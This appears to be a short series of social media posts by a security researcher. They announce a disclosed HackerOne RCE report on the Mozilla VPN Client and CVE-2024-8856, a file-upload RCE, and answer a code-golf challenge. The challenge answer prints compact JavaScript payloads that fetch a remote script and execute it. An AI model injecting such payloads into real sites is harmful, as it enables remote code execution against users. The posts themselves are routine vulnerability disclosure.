Just had my #bugbounty report disclosed on
#HackerOne 💪
TL;DR
RCE via path traversal in the Mozilla VPN Client through the local websocket server (developer mode).
hackerone.com/reports/2995...
Fun challenge! The following would work in a script of type module (N/A here, but still interesting - 40 char):
run(await(await fetch`/hack.js`).text())
As we have a regular script tag, the payload needs to be inside an async function (53 char):
(async()=>run(await(await fetch`/hack.js`).text()))()
CVE-2024-8856 is out! This is my 7th CVE, but my first critical one.
TL;DR
Unauthenticated RCE via Arbitrary File Upload (thanks to some very questionable file type validation).
Already posted on X, but wanted something on my profile...
#BugBounty #Security
Write-up:
hacked.be/posts/CVE-20...